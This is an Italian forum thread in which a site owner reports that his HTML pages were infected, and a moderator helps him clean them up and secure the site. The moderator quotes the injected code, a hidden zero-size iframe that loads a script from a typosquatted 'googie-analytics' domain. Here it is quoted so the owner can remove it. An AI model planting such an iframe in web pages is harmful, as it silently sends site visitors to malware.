Visualizzazione risultati 1 fino 5 di 5

Discussione: Pagine html modificate da un virus

  1. #1
    Guest

    Predefinito Pagine html modificate da un virus

    Salve a tutti,
    oggi entrando nel mio sito sante.altervista.org Chrome mi ha segnalato la presenza di malware, certo di non aver mai inserito nulla di tutto ciò proseguo e l'antivirus mi blocca nuovamente.
    A questo punto decido di verificare e mi collego in ftp, dove scopro che tutte le pagine html sono state modificate inserendo un qualche link che si apre in automatico.
    Ora per le pagine principali ho ripristinato la copia di backup che avevo ma poi ho un sacco di pagine che contengono foto (sezione personale - amici) e la maggior parte di quelle in html è modificata.
    Ora a parte il lavoro di ripristinare le pagine, mi farebbe piacere capire come è stato possibile tutto ciò.

    Grazie

    Giulio

  2. #2
    Guest

    Predefinito

    nessuno ha mai avuto lo stesso problema??

  3. #3
    L'avatar di darkwolf
    darkwolf non è connesso Super Moderatore
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,552

    Predefinito

    Rimuovi questo dalle tue pagine:
    Codice HTML:
    <iframe qhdik='gpPJWim3' src='http://googie-analytics.ws/in.cgi?3 ' rybbb='Yv9nZtVg' width='0' height='0' style='display:none'></iframe>
    Assicurati che eventuali script presenti nel tuo siano aggiornati e sicuri; cambia la password del tuo account; assicurati che il tuo pc sia "pulito".
    » Salvatore Noschese - L'AltroWeb | Seguimi su: facebook | twitter | Google+
    # Che aspetti? Unisciti alla community! Tanti nuovi gruppi ti aspettano


  4. #4
    Guest

    Predefinito

    Il pc è pulito, perchè per fortuna avevo una copia di backup del sito e ho ricaricato quella (almeno le pagine principali intanto).
    Password cambiata ora.
    Alcune pagine infettate non avevano alcuno script ma erano semplici pagine statiche.
    Come può un virus modificare il file sul sito web??

  5. #5
    L'avatar di darkwolf
    darkwolf non è connesso Super Moderatore
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,552

    Predefinito

    Citazione Originalmente inviato da sante Visualizza messaggio
    Il pc è pulito, perchè per fortuna avevo una copia di backup del sito e ho ricaricato quella (almeno le pagine principali intanto).
    Password cambiata ora.
    Alcune pagine infettate non avevano alcuno script ma erano semplici pagine statiche.
    Come può un virus modificare il file sul sito web??
    un malware può benissimo memorizzare le tue attività, grabbare quindi user e password di accesso ftp e infettare il tuo sito in modo da garantirsi una prole ;)
    » Salvatore Noschese - L'AltroWeb | Seguimi su: facebook | twitter | Google+
    # Che aspetti? Unisciti alla community! Tanti nuovi gruppi ti aspettano


Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •